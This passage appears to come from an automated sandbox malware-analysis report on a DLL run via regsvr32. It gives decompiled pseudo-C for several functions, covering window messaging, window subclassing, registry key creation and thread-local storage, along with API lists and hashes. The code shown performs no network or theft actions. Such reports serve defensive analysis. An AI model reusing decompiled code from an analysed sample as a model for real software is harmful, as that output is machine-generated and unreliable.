                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
                                                                                                                                                                            • UpdateWindow.USER32(?), ref: 1000F761
                                                                                                                                                                            • SendMessageA.USER32 ref: 1000F785
                                                                                                                                                                            • SendMessageA.USER32 ref: 1000F79F
                                                                                                                                                                            • UpdateWindow.USER32(?), ref: 1000F7E5
                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819
                                                                                                                                                                              • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2853195852-0
                                                                                                                                                                            • Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                                                                                            • Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                                                                                            • Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                                                                                            				long _v4;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				long _t20;
                                                                                                                                                                            				long _t21;
                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                            				long _t25;
                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            				long _t39;
                                                                                                                                                                            				long _t41;
                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                            				struct HWND__* _t47;
                                                                                                                                                                            				struct HWND__* _t49;
                                                                                                                                                                            				long _t51;
                                                                                                                                                                            				long _t53;
                                                                                                                                                                            
                                                                                                                                                                            				_t46 = __edi;
                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                            				_t37 = __ebx;
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                                                                                            					_t51 = E1000A7CE();
                                                                                                                                                                            					__eflags = _t51;
                                                                                                                                                                            					if(_t51 != 0) {
                                                                                                                                                                            						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                                                                                            						__eflags = _t20;
                                                                                                                                                                            						_t41 = _t51;
                                                                                                                                                                            						_pop(_t52);
                                                                                                                                                                            						if(_t20 != 0) {
                                                                                                                                                                            							_t53 = _t41;
                                                                                                                                                                            							_t21 =  *(_t53 + 0x64);
                                                                                                                                                                            							__eflags = _t21;
                                                                                                                                                                            							if(_t21 == 0) {
                                                                                                                                                                            								_pop(_t52);
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t21 - 0x3f107;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
                                                                                                                                                                            									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                                                                                            								}
                                                                                                                                                                            								return _t21;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_push(_t41);
                                                                                                                                                                            							_push(_t37);
                                                                                                                                                                            							_push(0);
                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                            							_push(_t46);
                                                                                                                                                                            							_v4 = _t41;
                                                                                                                                                                            							_t22 = GetCapture();
                                                                                                                                                                            							_t51 = SendMessageA;
                                                                                                                                                                            							_t37 = 0x365;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t47 = _t22;
                                                                                                                                                                            								__eflags = _t47;
                                                                                                                                                                            								if(_t47 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                                                                                            								__eflags = _t23;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									L27:
                                                                                                                                                                            									return _t23;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t24 = GetFocus();
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t46 = _t24;
                                                                                                                                                                            								__eflags = _t46;
                                                                                                                                                                            								if(_t46 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                                                                                            								__eflags = _t23;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t39 = _v4;
                                                                                                                                                                            							_t25 = E10010DEC(_t37, _t39, _t46);
                                                                                                                                                                            							__eflags = _t25;
                                                                                                                                                                            							if(_t25 != 0) {
                                                                                                                                                                            								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									_t49 = _t26;
                                                                                                                                                                            									__eflags = _t49;
                                                                                                                                                                            									_push(0);
                                                                                                                                                                            									if(_t49 == 0) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                                                                                            									__eflags = _t23;
                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                            										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push(_t39);
                                                                                                                                                                            						_v28 = 0x10057298;
                                                                                                                                                                            						E10017C83( &_v28, 0x1002e2fc);
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						E10017BC1(E10027DEC, _t37, _t46, _t51);
                                                                                                                                                                            						_t43 = E10013965(0x104);
                                                                                                                                                                            						_v40 = _t43;
                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                            						_v28 = 0;
                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                            							_t33 = E1000CF71(_t43);
                                                                                                                                                                            						}
                                                                                                                                                                            						return E10017C60(_t33);
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags = __eax - 0x3f107;
                                                                                                                                                                            					if(__eax != 0x3f107) {
                                                                                                                                                                            						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					return __eax;
                                                                                                                                                                            				}
                                                                                                                                                                            				L33:
                                                                                                                                                                            			}
























                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8f
                                                                                                                                                                            0x1000aeaa
                                                                                                                                                                            0x1000aeac
                                                                                                                                                                            0x1000aeae
                                                                                                                                                                            0x1000aeb9
                                                                                                                                                                            0x1000aebf
                                                                                                                                                                            0x1000aec1
                                                                                                                                                                            0x1000aec3
                                                                                                                                                                            0x1000aec4
                                                                                                                                                                            0x100142c8
                                                                                                                                                                            0x100142ca
                                                                                                                                                                            0x100142cd
                                                                                                                                                                            0x100142cf
                                                                                                                                                                            0x100142f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100142d1
                                                                                                                                                                            0x100142d1
                                                                                                                                                                            0x100142d6
                                                                                                                                                                            0x100142d8
                                                                                                                                                                            0x100142e9
                                                                                                                                                                            0x100142e9
                                                                                                                                                                            0x100142f0
                                                                                                                                                                            0x100142f0
                                                                                                                                                                            0x1000aec6
                                                                                                                                                                            0x10014229
                                                                                                                                                                            0x10014229
                                                                                                                                                                            0x1001422a
                                                                                                                                                                            0x1001422b
                                                                                                                                                                            0x1001422c
                                                                                                                                                                            0x1001422d
                                                                                                                                                                            0x1001422e
                                                                                                                                                                            0x10014232
                                                                                                                                                                            0x10014238
                                                                                                                                                                            0x1001423e
                                                                                                                                                                            0x10014257
                                                                                                                                                                            0x10014257
                                                                                                                                                                            0x10014259
                                                                                                                                                                            0x1001425b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001424b
                                                                                                                                                                            0x1001424d
                                                                                                                                                                            0x1001424f
                                                                                                                                                                            0x100142c1
                                                                                                                                                                            0x100142c6
                                                                                                                                                                            0x10014251
                                                                                                                                                                            0x10014252
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014252
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001424f
                                                                                                                                                                            0x1001425d
                                                                                                                                                                            0x10014275
                                                                                                                                                                            0x10014275
                                                                                                                                                                            0x10014277
                                                                                                                                                                            0x10014279
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014269
                                                                                                                                                                            0x1001426b
                                                                                                                                                                            0x1001426d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001426f
                                                                                                                                                                            0x10014270
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014270
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001426d
                                                                                                                                                                            0x1001427b
                                                                                                                                                                            0x1001427f
                                                                                                                                                                            0x10014284
                                                                                                                                                                            0x10014286
                                                                                                                                                                            0x10014290
                                                                                                                                                                            0x100142a7
                                                                                                                                                                            0x100142a7
                                                                                                                                                                            0x100142a9
                                                                                                                                                                            0x100142ab
                                                                                                                                                                            0x100142ac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001429b
                                                                                                                                                                            0x1001429d
                                                                                                                                                                            0x1001429f
                                                                                                                                                                            0x100142a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100142a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001429f
                                                                                                                                                                            0x100142bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014288
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014288
                                                                                                                                                                            0x10014286
                                                                                                                                                                            0x1000aeb0
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000ae91
                                                                                                                                                                            0x1000ae91
                                                                                                                                                                            0x1000ae96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ae9d
                                                                                                                                                                            0x1000aea3
                                                                                                                                                                            0x1000aea3
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3219385341-0
                                                                                                                                                                            • Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                                                                                            • Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
                                                                                                                                                                            • Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                                                                                            • Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000FC8A(intOrPtr* __ecx) {
                                                                                                                                                                            				struct HWND__* _v40;
                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				void* _v52;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				long _t43;
                                                                                                                                                                            				struct HWND__* _t48;
                                                                                                                                                                            				long _t61;
                                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                            
                                                                                                                                                                            				_t72 = __ecx;
                                                                                                                                                                            				_t69 = E1000B510();
                                                                                                                                                                            				if(_t69 != 0) {
                                                                                                                                                                            					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                                                                                            						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                                                                                            						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                                                                                            				if(_t63 != 0) {
                                                                                                                                                                            					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                                                                                            					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t64 =  *(_t72 + 0x4c);
                                                                                                                                                                            				if(_t64 != 0) {
                                                                                                                                                                            					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                                                                                            				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                                                                                            				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                                                                                            					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                                                                                            					if(_t71 != 0) {
                                                                                                                                                                            						_t85 =  *(_t71 + 0x20);
                                                                                                                                                                            						if( *(_t71 + 0x20) != 0) {
                                                                                                                                                                            							E100174D0(_t71,  &_v52, 0, 0x30);
                                                                                                                                                                            							_t48 =  *(_t72 + 0x20);
                                                                                                                                                                            							_v44 = _t48;
                                                                                                                                                                            							_v40 = _t48;
                                                                                                                                                                            							_v52 = 0x28;
                                                                                                                                                                            							_v48 = 1;
                                                                                                                                                                            							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                                                                                            				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
                                                                                                                                                                            				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                                                                                            					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                                                                                            					if(_t43 != 0) {
                                                                                                                                                                            						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				E1000FBD6(_t61, _t72);
                                                                                                                                                                            				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                                                                                            			}



















                                                                                                                                                                            0x1000fc93
                                                                                                                                                                            0x1000fc9a
                                                                                                                                                                            0x1000fca0
                                                                                                                                                                            0x1000fca5
                                                                                                                                                                            0x1000fcca
                                                                                                                                                                            0x1000fcca
                                                                                                                                                                            0x1000fcd0
                                                                                                                                                                            0x1000fcd2
                                                                                                                                                                            0x1000fcd2
                                                                                                                                                                            0x1000fcd0
                                                                                                                                                                            0x1000fcd5
                                                                                                                                                                            0x1000fcda
                                                                                                                                                                            0x1000fcde
                                                                                                                                                                            0x1000fce1
                                                                                                                                                                            0x1000fce1
                                                                                                                                                                            0x1000fce4
                                                                                                                                                                            0x1000fcec
                                                                                                                                                                            0x1000fcf1
                                                                                                                                                                            0x1000fcf1
                                                                                                                                                                            0x1000fcf4
                                                                                                                                                                            0x1000fcf8
                                                                                                                                                                            0x1000fcfb
                                                                                                                                                                            0x1000fd02
                                                                                                                                                                            0x1000fd07
                                                                                                                                                                            0x1000fd09
                                                                                                                                                                            0x1000fd0d
                                                                                                                                                                            0x1000fd17
                                                                                                                                                                            0x1000fd1c
                                                                                                                                                                            0x1000fd22
                                                                                                                                                                            0x1000fd25
                                                                                                                                                                            0x1000fd36
                                                                                                                                                                            0x1000fd3d
                                                                                                                                                                            0x1000fd40
                                                                                                                                                                            0x1000fd40
                                                                                                                                                                            0x1000fd0d
                                                                                                                                                                            0x1000fd07
                                                                                                                                                                            0x1000fd56
                                                                                                                                                                            0x1000fd58
                                                                                                                                                                            0x1000fd67
                                                                                                                                                                            0x1000fd73
                                                                                                                                                                            0x1000fd77
                                                                                                                                                                            0x1000fd7f
                                                                                                                                                                            0x1000fd7f
                                                                                                                                                                            0x1000fd77
                                                                                                                                                                            0x1000fd87
                                                                                                                                                                            0x1000fd9a

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongWindow$MessageSend_memset
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 2997958587-3887548279
                                                                                                                                                                            • Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                                                                                            • Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013E40(intOrPtr __ecx) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				void* _v16;
                                                                                                                                                                            				int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            
                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                                                                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					RegCloseKey(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                            					RegCloseKey(_v12);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _v16;
                                                                                                                                                                            			}









                                                                                                                                                                            0x10013e5b
                                                                                                                                                                            0x10013e62
                                                                                                                                                                            0x10013e65
                                                                                                                                                                            0x10013e68
                                                                                                                                                                            0x10013e6b
                                                                                                                                                                            0x10013e76
                                                                                                                                                                            0x10013ead
                                                                                                                                                                            0x10013ead
                                                                                                                                                                            0x10013eb8
                                                                                                                                                                            0x10013ebd
                                                                                                                                                                            0x10013ebd
                                                                                                                                                                            0x10013ec2
                                                                                                                                                                            0x10013ec7
                                                                                                                                                                            0x10013ec7
                                                                                                                                                                            0x10013ed0

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10013EBD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10013EC7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreate$Open
                                                                                                                                                                            • String ID: software
                                                                                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                                                                                            • Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                                                                                            • Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
                                                                                                                                                                            • Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                                                                                            • Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E10013CEE(void* __ecx, long* __edi, void* __esi) {
                                                                                                                                                                            				long _t22;
                                                                                                                                                                            				void* _t23;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                            				long* _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            
                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                            				_t40 = __edi;
                                                                                                                                                                            				_t31 = __ecx;
                                                                                                                                                                            				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                                                                                            				E10017C83(0, 0);
                                                                                                                                                                            				_t22 = E100134F9(_t31, 0, __edi[3], 4);
                                                                                                                                                                            				_t33 = 2;
                                                                                                                                                                            				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                                                                                            				_t46 = _t23;
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                                                                                            					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t41 + 0xc) = _t23;
                                                                                                                                                                            				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                                                                                            				 *(_t41 + 8) = _t40[3];
                                                                                                                                                                            				TlsSetValue( *_t40, _t41);
                                                                                                                                                                            				_t35 =  *(_t42 + 8);
                                                                                                                                                                            				_t28 =  *(_t41 + 0xc);
                                                                                                                                                                            				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                                                                                            					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                                                                                            				}
                                                                                                                                                                            				_push( *(_t42 - 0x14));
                                                                                                                                                                            				LeaveCriticalSection();
                                                                                                                                                                            				return E10017C60(_t28);
                                                                                                                                                                            			}












                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cf5
                                                                                                                                                                            0x10013cff
                                                                                                                                                                            0x10013d0b
                                                                                                                                                                            0x10013d11
                                                                                                                                                                            0x10013d16
                                                                                                                                                                            0x10013d1c
                                                                                                                                                                            0x10013d1e
                                                                                                                                                                            0x10013d23
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d31
                                                                                                                                                                            0x10013d42
                                                                                                                                                                            0x10013d4e
                                                                                                                                                                            0x10013d53
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013d5c
                                                                                                                                                                            0x10013d61
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d74
                                                                                                                                                                            0x10013d7f

                                                                                                                                                                            APIs
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10013CFF
